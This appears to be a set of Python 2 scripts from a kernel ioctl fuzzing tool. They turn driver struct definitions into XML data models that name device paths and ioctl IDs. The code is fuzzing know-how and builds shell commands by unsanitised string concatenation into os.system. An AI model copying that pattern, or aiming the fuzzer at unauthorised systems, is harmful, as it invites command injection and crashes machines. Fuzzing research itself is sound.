required_structs) 48 | 49 | blocks = choice.findall('Block') 50 | for block in blocks: 51 | # if the block is a ref, we need to define that struct 52 | # though we won't need a blob for it 53 | # we'll also want to recurse into it to check for ptrs 54 | ref_to = block.get('ref') 55 | if ref_to is not None: 56 | resolved_ele = root[lookup.get(ref_to)] 57 | # note, we'll want a struct def for this, but not a blob since it's part of the struct 58 | if resolved_ele in required_structs: 59 | required_structs.remove(resolved_ele) 60 | required_structs.append(resolved_ele) 61 | doit(resolved_ele, required_structs) 62 | 63 | # if it's an array...ugh 64 | occurs = block.get('maxOccurs') 65 | if occurs is not None: 66 | array_hero(block, required_structs, parent_struct_name, occurs) 67 | 68 | 69 | def array_hero(block, required_structs, parent_struct_name, occurs): 70 | elem_size_bytes = int(block.get('elem_size')) 71 | arr_offset = int(block.get('offset')) 72 | pointers = block.findall('Pointer') 73 | for ptr in pointers: 74 | ptr_to = ptr.get('ptr_to') 75 | if ptr_to is not None: 76 | # generic ptr arry 77 | if ptr_to in ['Number', 'String', 'function']: 78 | pass 79 | 80 | # complex ptr array 81 | else: 82 | resolved_ele = root[lookup.get(ptr_to)] 83 | if resolved_ele in required_structs: 84 | required_structs.remove(resolved_ele) 85 | required_structs.append(resolved_ele) 86 | # if it's a recursive struct, don't recurse into it 87 | if parent_struct_name != ptr_to: 88 | # TODO: CHECKME 89 | # reset cur_offset to 0 because it's a pointer 90 | doit(resolved_ele, required_structs) 91 | 92 | 93 | inner_blocks = block.findall('Block') 94 | for inner_block in inner_blocks: 95 | ref_to = inner_block.get('ref') 96 | if ref_to is not None: 97 | resolved_ele = root[lookup.get(ref_to)] 98 | if resolved_ele in required_structs: 99 | required_structs.remove(resolved_ele) 100 | required_structs.append(resolved_ele) 101 | doit(resolved_ele, required_structs) 102 | 103 | # if it's an array...ugh 104 | inner_occurs = inner_block.get('maxOccurs') 105 | if inner_occurs is not None: 106 | new_occurs = str(int(occurs) * int(inner_occurs)) 107 | array_hero(inner_block, required_structs, parent_struct_name, new_occurs) 108 | 109 | 110 | # jay CHECKME. FUCK. 111 | choices = block.findall('Choice') 112 | for choice in choices: 113 | union_hero(choice, required_structs, parent_struct_name) 114 | 115 | 116 | def doit(node, required_structs): 117 | struct_name = node.get('name') 118 | pointers = node.findall('Pointer') 119 | 120 | for ptr in pointers: 121 | ptr_to = ptr.get('ptr_to') 122 | if ptr_to is not None: 123 | if ptr_to in ['Number', 'String', 'function']: 124 | pass 125 | 126 | else: 127 | resolved_ele = root[lookup.get(ptr_to)] 128 | if resolved_ele in required_structs: 129 | required_structs.remove(resolved_ele) 130 | required_structs.append(resolved_ele) 131 | # if it's a recursive struct, don't recurse into it 132 | if struct_name != ptr_to and ptr_to not in seen: 133 | seen.append(ptr_to) 134 | doit(resolved_ele, required_structs) 135 | 136 | blocks = node.findall('Block') 137 | for block in blocks: 138 | # if the block is a ref, we need to define that struct 139 | # though we won't need a blob for it 140 | # we'll also want to recurse into it to check for ptrs 141 | ref_to = block.get('ref') 142 | if ref_to is not None: 143 | resolved_ele = root[lookup.get(ref_to)] 144 | if resolved_ele in required_structs: 145 | required_structs.remove(resolved_ele) 146 | required_structs.append(resolved_ele) 147 | # Also note, this struct ref may have ptrs in it, so pass along our new offset 148 | doit(resolved_ele, required_structs) 149 | 150 | # if it's an array...ugh 151 | occurs = block.get('maxOccurs') 152 | if occurs is not None: 153 | array_hero(block, required_structs, struct_name, occurs) 154 | 155 | choices = node.findall('Choice') 156 | for choice in choices: 157 | # note this choice may have ptrs, so pass along our current offset 158 | union_hero(choice, required_structs, struct_name) 159 | 160 | return required_structs 161 | 162 | def create_lookup(root): 163 | lookup = {} 164 | for x in range(len(root)): 165 | lookup[root[x].get('name')] = x 166 | 167 | return lookup 168 | 169 | 170 | def create_info(devname, ioctl_id, target_struct): 171 | info_node = ET.Element('Config') 172 | devname_node = ET.Element('devname', value=devname) 173 | info_node.append(devname_node) 174 | ioctl_id_node = ET.Element('ioctl_id', value=ioctl_id) 175 | info_node.append(ioctl_id_node) 176 | target_struct_node = ET.Element('target_struct', value=target_struct) 177 | info_node.append(target_struct_node) 178 | 179 | info_node.tail='\n' 180 | return info_node 181 | 182 | def create_pit(dm_nodes, info_node): 183 | # create the outermost node 184 | peach_node = ET.Element('Mango', version='1.0', author='jay` bot', description="kickass autogenerated jpit") 185 | 186 | # info node next 187 | peach_node.append(info_node) 188 | 189 | # next we'll output the data models 190 | covered = [] 191 | dm_nodes.reverse() 192 | for dm in dm_nodes: 193 | if dm not in covered: 194 | peach_node.append(dm) 195 | covered.append(dm) 196 | else: 197 | print "WTF. Repeat DM!!" 198 | import ipdb;ipdb.set_trace() 199 | import sys;sys.exit(1) 200 | 201 | print prettify(peach_node) 202 | 203 | def make_nice(dm): 204 | if type(dm) != list: 205 | if dm.tag != 'DataModel': 206 | dm.text = '' 207 | dm.tail = '' 208 | else: 209 | dm.text = '' 210 | for field in dm: 211 | field.text = '' 212 | field.tail = '' 213 | children = field.getchildren() 214 | for child in children: 215 | make_nice(child) 216 | 217 | lookup = create_lookup(root) 218 | start_struct = root[lookup.get(main_struct)] 219 | required_structs = [] 220 | required_structs.append(start_struct) 221 | ok = doit(start_struct, required_structs) 222 | info_node = create_info(devname, ioctl_id, main_struct) 223 | 224 | for dm in required_structs: 225 | make_nice(dm) 226 | create_pit(required_structs, info_node) 227 | -------------------------------------------------------------------------------- /post_processing/pre_parse.py: -------------------------------------------------------------------------------- 1 | import xml.etree.ElementTree as ET 2 | from lxml import objectify 3 | from xml.dom import minidom 4 | import sys 5 | import re 6 | 7 | # Take h files and create xml files 8 | # fixup the XML such that it accounts for padding 9 | # fixup the XML such that enums and vals are included from other headers 10 | debug=0 11 | 12 | tree = ET.parse(sys.argv[1]) 13 | root = tree.getroot() 14 | # have to make each name unique 15 | i=0 16 | skip_len = len('') 17 | def prettify(elem): 18 | #Return a pretty-printed XML string for the Element. 19 | rough_string = ET.tostring(elem, 'utf-8') 20 | reparsed = minidom.parseString(rough_string) 21 | return reparsed.toprettyxml(indent=" ")[skip_len+1:-1:] 22 | 23 | def get_index(findme, elem_list): 24 | for index, elem in enumerate(elem_list): 25 | if (findme == elem): 26 | return index 27 | 28 | return -1 29 | 30 | def get_structs(root): 31 | struct_nodes = [] 32 | for child in root: 33 | if child.get('type') == 'struct': 34 | struct_nodes.append(child) 35 | 36 | if debug: 37 | print len(struct_nodes) 38 | return struct_nodes 39 | 40 | 41 | def insert_padding(struct, elem, pad_size, member_offset): 42 | global i 43 | kwargs = {'ident':"padding" + str(i), 'length':str(pad_size), 'base-type-builtin':'padding', 'bit-size':str(pad_size*8)} 44 | pad_node = ET.Element("jay_symbol" ,**kwargs) 45 | i+=1 46 | pad_node.tail = "\n " 47 | struct.insert(member_offset, pad_node) 48 | 49 | 50 | def fixup_struct(struct): 51 | if debug: 52 | print struct.get('ident') 53 | print "+"*20 54 | old_elem_end = 0 55 | cur_idx = 0 56 | total = len(struct) 57 | tot_size = struct.get('bit-size') 58 | tot_bytes = int(tot_size)/8 59 | cur_size = 0 60 | while (cur_idx < total): 61 | elem = struct[cur_idx] 62 | pad_size = 0 63 | offset = int(elem.get('offset')) 64 | if debug: 65 | print "old_elem_end:", old_elem_end 66 | print "offset:", offset 67 | if ( old_elem_end != offset ): 68 | pad_size = offset-old_elem_end 69 | if debug: 70 | print "pad with %d bytes" % pad_size 71 | insert_padding(struct, elem, pad_size, cur_idx) 72 | cur_idx += 1 73 | total += 1 74 | 75 | bit_size = int(elem.get('bit-size')) 76 | old_elem_end = ( (bit_size/8) + offset) 77 | cur_idx += 1 78 | if debug: 79 | print "==" 80 | 81 | global i 82 | if old_elem_end < tot_bytes: 83 | end_pad_amount = tot_bytes - old_elem_end 84 | kwargs = {'ident':"padding" + str(i), 'length':str(end_pad_amount), 'base-type-builtin':'padding', 'bit-size':str(end_pad_amount*8)} 85 | pad_node = ET.Element("jay_symbol" ,**kwargs) 86 | i+=1 87 | elem.tail += ' ' 88 | pad_node.tail = "\n " 89 | #import ipdb;ipdb.set_trace() 90 | struct.append(pad_node) 91 | return struct 92 | 93 | struct_nodes = get_structs(root) 94 | for struct in struct_nodes: 95 | if debug: 96 | print '-'*20 97 | fixed = fixup_struct(struct) 98 | idx = get_index(struct, root) 99 | root.remove(struct) 100 | root.insert(idx, fixed) 101 | if debug: 102 | print '-'*20 103 | 104 | fname = sys.argv[1] 105 | tree.write(fname[0:-4] + "_fixup" + ".xml") 106 | -------------------------------------------------------------------------------- /post_processing/run_all.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | import glob 4 | import subprocess 5 | import md5 6 | import argparse 7 | out_dir = 'out/' 8 | xml_dir = 'xml/' 9 | generics_dir = 'generics/' 10 | commons_dir = 'common/' 11 | 12 | class Struct(object): 13 | def __init__(self): 14 | self.vals = [] 15 | 16 | def __getitem__(self, idx): 17 | return self.vals[idx] 18 | 19 | def add_val(self, val): 20 | self.vals.append(val) 21 | 22 | class Union(object): 23 | def __init__(self): 24 | self.vals = [] 25 | 26 | def __getitem__(self, idx): 27 | return self.vals[idx] 28 | 29 | def add_val(self, val): 30 | self.vals.append(val) 31 | 32 | def my_listdir(path): 33 | return glob.glob(os.path.join(path, '*')) 34 | 35 | def get_devpath(fname): 36 | marker = 'Device name finder' 37 | hit = 'Device Name' 38 | i = 0 39 | f = open(fname, 'r') 40 | data = f.read() 41 | f.close() 42 | lines = data.splitlines() 43 | for line in lines: 44 | if marker in line: 45 | return None 46 | elif hit in line: 47 | name = line[line.rfind(' ')+1::] 48 | type_line = lines[i+1] 49 | dev_type = type_line[type_line.rfind(' ')+1::] 50 | if dev_type == 'proc': 51 | dev_loc = dev_type 52 | else: 53 | dev_loc = '/dev/' 54 | dev_loc += name 55 | return dev_loc 56 | 57 | i += 1 58 | 59 | print "Something is weird about the ioctl out file.." 60 | import ipdb;ipdb.set_trace() 61 | return None 62 | 63 | def get_struct_name(line): 64 | struct_name = line[line.find('.')+1:line.find('=')-1] 65 | return struct_name 66 | 67 | def get_cmd_val(line): 68 | val_str = line[line.find(':')+1:line.rfind(':')] 69 | 70 | if 'BR' in line: 71 | first,second = val_str.split(',') 72 | if first == second: 73 | val_str = first 74 | # TODO: Check with machiry 75 | else: 76 | val_str = second 77 | 78 | try: 79 | val = int(val_str) 80 | val = abs(val) 81 | except ValueError: 82 | print "Bad val_str: %s" % val_str 83 | import ipdb;ipdb.set_trace() 84 | sys.exit(1) 85 | 86 | return val 87 | 88 | 89 | def emit_records_popping_cmd(popd_cmd, cmd_stack, records, global_type): 90 | 91 | # check if we have a record for our cmd, if so, just return 92 | for record in records: 93 | cmd = record[0] 94 | if popd_cmd == cmd: 95 | return 96 | 97 | # if not, check our parents records 98 | parent_had_record = False 99 | for parent in cmd_stack[:-1:]: 100 | parent_records = [] 101 | parent_had_record = False 102 | for record in records: 103 | cmd = record[0] 104 | arg = record[1] 105 | if cmd == parent: 106 | parent_had_record = True 107 | new_record = [popd_cmd, arg] 108 | records.append(new_record) 109 | if parent_had_record: 110 | break 111 | 112 | # last hope, check global type 113 | if parent_had_record == False: 114 | if global_type is None: 115 | return 116 | print '[*] Using global type! %s' % global_type 117 | new_record = [popd_cmd,global_type] 118 | records.append(new_record) 119 | 120 | 121 | return 122 | 123 | def emit_records_saw_type(cmd_stack, cmd_type, records): 124 | new_record = [cmd_stack[-1], cmd_type] 125 | records.append(new_record) 126 | return 127 | 128 | 129 | # get preprocessed files. Also serves as a precheck.. 130 | def get_pre_procs(lines): 131 | # first get the start idx 132 | idx = 0 133 | for line in lines: 134 | if 'ALL PREPROCESSED FILES' in line: 135 | break 136 | idx += 1 137 | if idx == len(lines): 138 | print "[!] Couldn't find preprocessed files!" 139 | return -1 140 | 141 | if 'Preprocessed' not in lines[idx-1]: 142 | return -1 143 | 144 | main_pre_proc = lines[idx-1][lines[idx-1].find(":")+1::] 145 | 146 | additional_pre_procs = [] 147 | for line in lines[idx+1:-2:]: 148 | additional_pre_procs.append(line[line.find(":")+1::]) 149 | 150 | if main_pre_proc in additional_pre_procs: 151 | additional_pre_procs.remove(main_pre_proc) 152 | to_ret = [main_pre_proc] 153 | to_ret.extend(additional_pre_procs) 154 | return to_ret 155 | 156 | 157 | def algo(fname): 158 | records = [] 159 | cmd_stack = [] 160 | global_type = None 161 | cur_cmd = None 162 | cur_type = None 163 | in_type = False 164 | in_anon_type = False 165 | 166 | f = open(fname, 'r') 167 | data = f.read() 168 | f.close() 169 | lines = data.splitlines() 170 | print '[+] Running on file %s' % fname 171 | name_line = lines[1] 172 | ioctl_name = name_line[name_line.find(': ')+2::] 173 | print '[+] ioctl name: %s' % ioctl_name 174 | 175 | pre_proc_files = get_pre_procs(lines) 176 | if pre_proc_files == -1: 177 | print "[*] Failed precheck" 178 | return records, [], ioctl_name 179 | 180 | # probably an uncessary sanity check 181 | if len(pre_proc_files) == 0: 182 | print "[*] Failed to find preproc files" 183 | import ipdb;ipdb.set_trace() 184 | 185 | for line in lines: 186 | if 'Found Cmd' in line: 187 | cmd_val = get_cmd_val(line) 188 | 189 | if 'START' in line: 190 | cmd_stack.append(cmd_val) 191 | cur_cmd = cmd_val 192 | 193 | elif 'END' in line: 194 | # the cmd val that's END'ing should always be the top guy on the stack 195 | if cmd_val != cmd_stack[-1]: 196 | print "Fucked up cmd stack state!" 197 | import ipdb;ipdb.set_trace() 198 | popd_cmd = cmd_stack.pop() 199 | emit_records_popping_cmd(popd_cmd, cmd_stack, records, global_type) 200 | cur_cmd = None 201 | 202 | elif 'STARTTYPE' in line: 203 | in_type = True 204 | 205 | # just saw a type, so time to emit a record 206 | elif 'ENDTYPE' in line: 207 | # THIS IS POSSIBLE -- IF THE COPY_FROM_USER IS ABOVE THE SWITCH. 208 | if cur_cmd is None: 209 | # push 210 | # Fuck....global anon 211 | print 'Setting global type' 212 | global_type = cur_type 213 | in_type = False 214 | cur_type = None 215 | continue 216 | 217 | if cur_type is None: 218 | print 'wtf. cur_type is None..' 219 | import ipdb;ipdb.set_trace() 220 | 221 | emit_records_saw_type(cmd_stack, cur_type, records) 222 | in_type = False 223 | cur_type = None 224 | 225 | elif in_type: 226 | # check if the type is a fuggin anon guy 227 | if 'anon' in line and 'STARTELEMENTS' in line: 228 | in_anon_type = True 229 | if 'struct' in line: 230 | cur_type = Struct() 231 | elif 'union' in line: 232 | cur_type = Union() 233 | else: 234 | print "Unknown anon type! %s" % line 235 | import ipdb;ipdb.set_trace() 236 | 237 | elif 'anon' in line and 'ENDELEMENTS' in line: 238 | in_anon_type = False 239 | pass 240 | 241 | elif in_anon_type: 242 | cur_type.add_val(line.strip()) 243 | 244 | else: 245 | cur_type = line 246 | 247 | return records, pre_proc_files, ioctl_name 248 | 249 | def get_relevant_preproc(struct_name, pre_procs, folder_name): 250 | found = False 251 | # a horrible hack.. 252 | for pre in pre_procs: 253 | stuff = subprocess.Popen(['grep', struct_name, pre], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) 254 | stdout, stderr = stuff.communicate() 255 | if len(stdout) > 0: 256 | found = True 257 | break 258 | 259 | if found == False: 260 | return -1 261 | 262 | # /home/jay/ioctl_stuff/llvm_out_new/drivers/hisi/tzdriver/tc_client_driver.preprocessed 263 | pre_fname = pre[pre.rfind('/')+1:pre.rfind('.'):] 264 | # check if we've parsed the found file 265 | path = out_dir + folder_name + '/' + xml_dir 266 | abs_path = os.path.abspath(path) 267 | 268 | potential_outfile = abs_path + '/' + pre_fname + '_out.xml' 269 | if os.path.exists(potential_outfile): 270 | return potential_outfile 271 | 272 | else: 273 | print '[@] Setting up a new out file: %s' % pre_fname 274 | return setup_files(pre, folder_name) 275 | 276 | 277 | def setup_files(pre_proc, folder_name): 278 | out = out_dir + folder_name + '/' + xml_dir 279 | # yeah yeah, this is pretty stupid but it's a simple unique check since there may be filename collisions 280 | md5_sum = md5.new(pre_proc).digest().encode('hex') 281 | output_base_name = pre_proc[pre_proc.rfind('/')+1:pre_proc.rfind('.'):] 282 | # make sure the xml file exists 283 | xml_out_path = os.path.abspath(out) 284 | if os.path.exists(xml_out_path) == False: 285 | os.mkdir(xml_out_path) 286 | 287 | # first check the commons file 288 | if os.path.exists(out_dir + '/' + commons_dir + output_base_name + '_' + md5_sum + '_out.xml') == True: 289 | print '[+] Found a match in commons!' 290 | return out_dir + commons_dir + output_base_name + '_' + md5_sum + '_out.xml' 291 | 292 | # create the c2xml file 293 | c2xml_cmd = './c2xml ' + pre_proc + ' > ' + out + output_base_name + '.xml' 294 | print c2xml_cmd 295 | os.system(c2xml_cmd) 296 | 297 | # pre_parse the file 298 | pre_parse_cmd = 'python pre_parse.py ' + out + output_base_name + '.xml' 299 | print pre_parse_cmd 300 | os.system(pre_parse_cmd) 301 | 302 | # parse the file 303 | parse_cmd = 'python parse.py ' + out + output_base_name + '_fixup.xml > ' + out + output_base_name + '_out.xml' 304 | print parse_cmd 305 | os.system(parse_cmd) 306 | out_file = out + output_base_name + '_out.xml' 307 | 308 | # cp it to the commons guy 309 | cp_cmd = 'cp ' + out_file + ' ' + out_dir + '/' + commons_dir + output_base_name + '_' + md5_sum + '_out.xml' 310 | print cp_cmd 311 | os.system(cp_cmd) 312 | 313 | return out_file 314 | 315 | 316 | # TODO: This is slow and stupid, fix it 317 | def pre_check(records): 318 | for record in records: 319 | cmd_type = record[1] 320 | if type(cmd_type) is str: 321 | if 'struct' in cmd_type or cmd_type in ['i16','i32','i64']: 322 | return True 323 | 324 | return False 325 | 326 | def is_array(cmd_type): 327 | if '[' in cmd_type and 'x' in cmd_type and ']' in cmd_type: 328 | return True 329 | else: 330 | return False 331 | 332 | def process_records(records, pre_procs, folder_name, device_name, dev_num): 333 | i = 0 334 | for record in records: 335 | cmd = record[0] 336 | cmd_type = record[1] 337 | 338 | file_name = folder_name + '_' + str(i) + '_' + str(cmd) + device_name.replace('/','-') + '.xml' 339 | 340 | # just accept normal structs for now 341 | if type(cmd_type) is str: 342 | # normal structs 343 | if 'struct' in cmd_type: 344 | struct_name = get_struct_name(cmd_type) 345 | out_file = get_relevant_preproc(struct_name, pre_procs, folder_name) 346 | if out_file == -1: 347 | print "[&] Couldn't find relevant out file!" 348 | import ipdb;ipdb.set_trace() 349 | # post_parse command 350 | post_parse_cmd = 'python post_parse.py ' + out_file + ' ' + device_name + ' ' + str(cmd) + ' ' + struct_name + ' > ' + out_dir + folder_name + '/' + file_name 351 | full_out_file = os.path.abspath(out_dir + folder_name + '/' + file_name) 352 | print post_parse_cmd 353 | os.system(post_parse_cmd) 354 | 355 | # check if we fucked up 356 | if os.path.getsize(full_out_file) == 0: 357 | print '[-] Created 0 size file! Removing!' 358 | os.remove(full_out_file) 359 | 360 | 361 | # generics 362 | elif cmd_type in ['i16', 'i32', 'i64']: 363 | struct_name = 'foo' 364 | post_parse_cmd = 'python post_parse.py ' + generics_dir + 'generic_' + cmd_type + '.xml ' + device_name + ' ' + str(cmd) + ' ' + struct_name + ' > ' + out_dir + folder_name + '/' + file_name 365 | full_out_file = os.path.abspath(out_dir + folder_name + '/' + file_name) 366 | print post_parse_cmd 367 | os.system(post_parse_cmd) 368 | 369 | # array 370 | elif is_array(cmd_type): 371 | struct_name = 'foo' 372 | file_name = folder_name + '_' + str(i) + '_arr' + device_name.replace('/','-') + '.xml' 373 | post_parse_cmd = 'python post_parse.py ' + generics_dir + 'generic_arr.xml ' + device_name + ' ' + str(cmd) + ' ' + struct_name + ' > ' + out_dir + folder_name + '/' + file_name 374 | full_out_file = os.path.abspath(out_dir + folder_name + '/' + file_name) 375 | print post_parse_cmd 376 | os.system(post_parse_cmd) 377 | 378 | 379 | # TODO: we need to create a custom header with either a union or struct 380 | else: 381 | pass 382 | i+=1 383 | 384 | 385 | def main(): 386 | global out_dir 387 | parser = argparse.ArgumentParser(description="run_all options") 388 | parser.add_argument('-f', type=str, help="Filename of the ioctl analysis output OR the entire output directory created by the system", required=True) 389 | parser.add_argument('-o', type=str, help="Output directory to store the results. If this directory does not exist it will be created", required=True) 390 | parser.add_argument('-n', type=str, help="Specify devname options. You can choose manual (specify every name manually), auto (skip anything that we don't identify a name for), or hybrid (if we detected a name, we use it, else we ask the user)", default="manual", choices=['manual', 'auto', 'hybrid']) 391 | parser.add_argument('-m', type=int, help="Enable multi-device output most ioctls only have one applicable device node, but some may have multiple. (0 to disable)", default=1) 392 | args = parser.parse_args() 393 | path = args.f 394 | out_dir = args.o 395 | name_mode = args.n 396 | multi_dev = args.m 397 | 398 | if out_dir[-1] != '/': 399 | out_dir = out_dir + '/' 400 | 401 | if os.path.exists(os.path.abspath(out_dir)) == False: 402 | print "[+] Creating your out directory for you" 403 | os.mkdir(os.path.abspath(out_dir)) 404 | 405 | if os.path.isfile(path) == False: 406 | files = my_listdir(path) 407 | else: 408 | files = [path] 409 | 410 | if os.path.exists(out_dir + commons_dir) == False: 411 | os.mkdir(out_dir + commons_dir) 412 | print "[+] About to run on %d ioctl info file(s)" % len(files) 413 | processed_files = [] 414 | algo_dict = {} 415 | for fname in files: 416 | if fname == "common": 417 | continue 418 | if os.path.isdir(fname): 419 | print "[^] Hit the V4L2 guy!" 420 | continue 421 | # Really we just need the preprocessed file at this point 422 | records, pre_proc_files, ioctl_name = algo(fname) 423 | 424 | if len(records) > 0: 425 | cwd = os.path.abspath('.') 426 | 427 | # check if device path exists 428 | if os.path.exists(cwd + '/' + out_dir + ioctl_name) == False: 429 | os.mkdir(out_dir + ioctl_name) 430 | else: 431 | print "[!] Skipping %s. out file exists" % ioctl_name 432 | continue 433 | 434 | # run a pre_check to make sure we have struct or generic args 435 | if pre_check(records) == False: 436 | print '[!] Skipping %s. No struct or generic args.' % ioctl_name 437 | continue 438 | 439 | # if we're running in full automode, make sure the device name has been recovered 440 | if name_mode == 'auto': 441 | dev_path = get_devpath(fname) 442 | if dev_path == None: 443 | print '[!] Skipping %s. Name was not recovered and running in auto mode.' % ioctl_name 444 | continue 445 | 446 | # setup files. This is done once per device/ioctl 447 | for record in records: 448 | struct_type = record[1] 449 | # nothing to process for generics 450 | if 'struct' not in struct_type: 451 | continue 452 | get_relevant_preproc(get_struct_name(struct_type), pre_proc_files, ioctl_name) 453 | #out_file = setup_files(pre_proc_files[0], ioctl_name) 454 | processed_files.append(fname) 455 | algo_dict[fname] = (records, pre_proc_files, ioctl_name) 456 | 457 | else: 458 | print '[!] Skipping %s. No commands found' % ioctl_name 459 | 460 | 461 | # pass #2 462 | for fname in processed_files: 463 | # parse the output 464 | records = algo_dict[fname][0] 465 | pre_proc_files = algo_dict[fname][1] 466 | ioctl_name = algo_dict[fname][2] 467 | 468 | # good to go 469 | print '[#] Operating on: %s' % fname 470 | 471 | num_devs = 1 472 | if multi_dev: 473 | print "Multiple Devices? (y/n):" 474 | multi_dev = raw_input("> ") 475 | if multi_dev == 'y': 476 | num = raw_input("num devices: ") 477 | num_devs = int(num) 478 | 479 | for x in range(num_devs): 480 | # if we're running in manual mode, ask for the device name regardless 481 | if name_mode == 'manual': 482 | print "Please enter a device name:" 483 | device_name = raw_input("> ") 484 | else: 485 | # if we're in auto mode and we've reached here, the name must exist 486 | # so no need to distinguish between auto and hybrid 487 | device_name = get_devpath(fname) 488 | if device_name == None: 489 | print "Please enter a device name:" 490 | device_name = raw_input("> ") 491 | 492 | process_records(records, pre_proc_files, ioctl_name, device_name, x) 493 | 494 | 495 | if __name__ == '__main__': 496 | main() 497 | -------------------------------------------------------------------------------- /utils.py: -------------------------------------------------------------------------------- 1 | 2 | base_types = ['int', 'unsigned int', 'float', 'char', 'unsigned char', 'double', 'long', 'unsigned long', 3 | 'unsigned long int', 'short', 'unsigned short', 'unsigned long long', 'void'] 4 | 5 | kernel_root = '' 6 | ctags = [] 7 | 8 | def is_contain_special_char(statement): 9 | special_chars = ['.','-','<','>','(',')','*','!','@','#','$','%','^','&','+','=', 10 | '/','\\','|',',','?','~','`', '{', '}','\'', '\"', ';'] 11 | for achar in special_chars: 12 | if achar in statement: 13 | return True 14 | return False --------------------------------------------------------------------------------